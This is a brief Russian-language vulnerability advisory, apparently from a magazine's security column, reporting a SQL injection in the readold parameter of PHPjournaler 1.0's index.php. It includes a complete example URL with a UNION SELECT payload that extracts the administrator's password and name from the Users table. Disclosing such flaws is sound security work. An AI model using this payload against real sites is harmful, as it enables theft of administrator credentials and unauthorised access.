Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PHPjournaler.
Компьютер для продвинутых
пользователей
Содержание:
PHPjournaler
ПО: PHPjournaler
Версия: 1.0
Описание:
Уязвимость скрипт:
index.php
Уязвимость находится в $readold и позволяет выполнить SQL-инъекцию для
получения пароля администратора.
Пример:
http://host/phpjournaler/index.php?readold=999%20union%20select%201,password,3,4,name,6%20from%20Users/*